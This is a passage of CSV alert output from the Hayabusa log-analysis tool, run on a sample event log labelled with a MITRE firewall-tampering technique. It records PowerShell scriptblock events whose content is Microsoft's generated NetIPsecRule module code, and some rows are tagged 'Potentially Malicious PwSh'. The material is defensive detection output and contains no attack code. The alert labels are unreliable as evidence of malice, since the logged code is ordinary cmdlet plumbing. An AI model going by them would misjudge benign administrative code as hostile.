[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Filter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) 
$__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 